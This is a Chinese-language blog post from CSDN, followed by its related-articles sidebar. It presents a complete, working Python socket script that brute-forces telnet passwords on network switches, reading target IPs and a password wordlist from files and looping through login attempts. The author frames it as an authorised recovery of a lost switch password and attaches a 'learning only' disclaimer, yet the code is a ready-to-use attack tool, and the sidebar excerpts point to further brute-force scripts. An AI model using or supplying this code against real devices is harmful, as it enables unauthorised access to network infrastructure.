【python--程序】telnet密码暴力破解

最新推荐文章于 2022-08-27 22:18:49 发布
最新推荐文章于 2022-08-27 22:18:49 发布
阅读量3k 收藏 4
点赞数 3
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43017750/article/details/102613358
版权

前言

最近博主单位的网络出现了故障,想要登陆到交换机中发现有密码。然而密码没有人知道,这可真难为人!博主第一时间想到的是hydra暴力破解工具,然而发现不支持密码验证的telnet。在获取领导的授权下,博主使用socket编写一款telnet密码爆破工具。警告:该程序仅供学习telnet协议工作原理,禁止用于违法行为。

环境分析

交换机的管理地址是:192.168.133.130
博主使用的地址是:192.168.133.1
使用crt登陆时的显示画面如下:
在这里插入图片描述通过wireshark抓包分析,我们大概得知了telnet的工作过程

在这里插入图片描述登陆过程如下:
第一步:首先客户端发送\r\n开始telnet登陆
第二步:服务器返回验证的方式
第三步:客户端输入验证的密码
第四步:服务器返回登陆结果

代码

# -*- coding:utf-8 -*-
#作者:猫先生的早茶
"""
从ip.txt文件中获取ip地址
从passowrd.txt文件中获取密码
尝试破解使用密码验证的telnet
"""

import socket,sys,time

class Telnet():
    def __init__(self):
        pass
        
    def read_file(self,filename):
        with open (filename,'r',encoding='utf-8') as read_file:
            return read_file.read().split('\n')

    def login(self,ip,password_list,port=23):
        #创建客户端对象
        client = socket.socket()
        client.settimeout(30)
        #连接到目标主机
        try:
            client.connect((ip,port))
        except:
            print ("[-]Don't connect {}:{}".format(ip,port))
            sys.exit()
        else:
            print ('[+]Connect Sussful!')
        #发送\r\n等待1秒服务端回应登陆方式
        client.send(b'\r\n')
        time.sleep(1)
        print ('[+]等待服务器响应中。。。')
        #接受服务器回应的数据
        data = client.recv(65535)
        print (data)
        #检测是否要输入密码
        if b'Password' in data:
            for password in password_list:
                #输入密码
                print ('[-]正在尝试使用密码:{} 登陆{}'.format(password,ip))
                client.send(password.encode('utf-8')+b'\r\n')
                #接受服务器返回的数据
                time.sleep(1)
                print ('[+]等待服务器回应中。。。')
                #清楚缓存并接受服务器数据
                temp_data =b''
                temp_data = client.recv(8192)
                print (temp_data)
                #判断登陆成功,如果成功则退出破解
                if b'>' in temp_data:
                    print ("[+]Login Sussful!{}:{} password:{}".format(ip,port,password))
                    break
                #判断接受到的是报错信息
                if b'Error: The password is invalid.'in temp_data  or b'%Username or password is invalid.' in temp_data and  b'Password:'not in temp_data:
                    while True:
                        #当收到错误信息,发送\r\n模拟用户敲回车
                        #client.close()
                        #创建客户端对象
                        #client = socket.socket()
                        #client.connect((ip,port))
                        client.send(b'\r\n')
                        time.sleep(1)
                        #清除缓存
                        temp_data = b''
                        #接受用户数据
                        temp_data = client.recv(8192)
                        print (temp_data)
                        #检测是否可以输入密码
                        if b'Password:' in temp_data:
                            break
                
        
    def main(self):
        #读取ip文件
        ip_list = self.read_file('ip.txt')
        #读取密码文件
        password_list = self.read_file('password.txt')
        #尝试登陆
        for ip in ip_list[:1]:
            self.login(ip,password_list)
        
        
telnet = Telnet()
telnet.main()
猫先生的早茶
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
2024年Python最全python爬虫爬取彼岸图网图片(1)
2301_82242675的博客
04-30 699
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。别在网上瞎学了,我最近也做了一些资源的更新,只要你是我的粉丝,这期福利你都可拿走。
Telnet-crack:Telnet——破解(python
05-26
Telnet-crack Telnet——crack (python) 本程序由Xfree团队编写 转载请说明出处 windows下测试通过 可破解windows,linux,H3C路由器, 理论上也可破解root后的安卓手机,但是未测试 注意字典最后一行不要有换行,不然会进入死循环 编程技术还是有待长进啊 写这个程序把我累死了。 印度阿三能写的东西,我不照样搞出来了么。 风炫 2015年5月8日
telnet 密码破解
05-06
可以对网络设备的telnet密码进行在线破解,适用于经常忘密码的网管。
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 2968
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
Python Telnet弱口令爆破脚本及遇到的错误与问题
weixin_30779691的博客
07-04 504
写得时候遇到了一个很大的问题,就是我在发送用户名,接受用户名就会一直卡住。然后等了好久后提示 recv ‘\r\nSession timed out.\r\n\r\nTelnet Server has closed t’ 虚拟机服务器是Win7的 主机客户也是Win7。 原来代码是: 1、一开始觉得是因为socket 设置的问题,上网查了很久,也按他们的方法改了,但都不管用。...
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2.Request(url,headers={"Cookie":"security=high;PHP
实验四:Python编写协议爆破指令
qq_44118750的博客
05-15 365
课程名称 网络安全软件开发 指导教师 石老师 实验日期 2020-4-2 班 级 网络2班 姓 名 纯软女孩 学 号 2018**************** 实验成绩 一、...
telnet爆破
qq_54713392的博客
05-09 275
telnet爆破 利用msf中的telnet_login模块对metasploitable的ssh服务实施爆破攻击 在kali里启动msf 使用search查询telent_login模块,然后使用use调用该模块 设置连接metasploitable的ip地址,使用set rhosts ip地址 设置用户名和密码文件 Run实行爆破 ...
Python-微信小程序自动刷分脚本
04-24
装有Python2.7.* cv2 adb的计算机一台 拥有USB调试权限的Android手机一台,不对IOS系统支持
python-3.7.9-amd64.exe
06-16
3. **安装过程**:安装程序`python-3.7.9-amd64.exe`会引导用户完成一系列步骤,包括选择安装路径、是否设置Python为系统默认解释器、添加环境变量等。安装完成后,Python解释器和标准库将被安装在指定位置,同时...
Python脚本暴力破解栅栏密码
01-21
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。 方法一(通用脚本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(‘请输入要解密的字符串\n‘) elen = len(e...
Python-开源Telnet蜜罐Honeypot
08-10
Python-开源Telnet蜜罐Honeypot】 在网络安全领域,蜜罐(Honeypot)是一种主动防御技术,它模拟系统或网络资源来吸引并诱捕攻击者。蜜罐通常不承载真实数据,而是收集攻击者的活动信息,帮助研究攻击手段、策略...
python-language-server:Python语言服务器协议的实现
04-28
例如,要安装YAPF格式: pip install 'python-language-server[yapf]' 可以使用以下命令安装所有可选提供程序: pip install 'python-language-server[all]' 如果收到类似于'install_requires' mus
内网渗透(telnet爆破)
m0_46684679的博客
07-27 3736
python实现变位词 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy
破解文件系统telnet密码【ZT】
张继飞的专栏
12-12 1896
http://www.ebaina.com/u-mx644978170/blog-74.html   因工作需要需要调试某公司的3531板子,运行我们的程序,从整个调试过程中还是学到一些知识的现在记录下。 拿到板子找到串口挂上,上电串口消息如下: [bash] U-Boot 2010.06-svn83 (Jan 06 2013 - 17:36:14) DRAM: 256 MiB NAND: S...
python3实现小型网页用户名密码暴力破解
01-14 1001
python3实现小型网页用户名密码暴力破解 代码如下 import requests import itertools as its #包含所有密码 words = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&'( )*+,-./:;<=>?@[]^_`{|}~" url = "http://192.168.1.152/user/login" header = { 'User-A
telnet 弱口令爆破 菜刀提权
qq_56889067的博客
11-15 7516
第一题、使用2.txt密字典、爆破test用户的密码 使用nmap -sV 扫描目标靶机 IP 获取 靶机开启的端口及服务的版本信息。 发现开启的有22、23 端口及服务。这里我们使用 telnet服务进行爆破、使用msfconsole打开永恒之蓝。 使用search telnet_login 查看 telnet爆破模块。 使用use 调用 此模块,接着在模块内使用命令options查看需要配置的参数。 接下来配置参数RHOSTS目标IP,PASS_FILE 密码字典,USE...
python实现远程telnet登录
最新发布
锅锅的博客
08-27 5641
python登录telnet
Telnet弱口令猜解【Python脚本】
12-07 178
telnet 弱口令猜解脚本 测试环境:window2003、centos7 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import telnetlib username_list=['xiaozi','administrator'] password_list=['root','','abc12...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值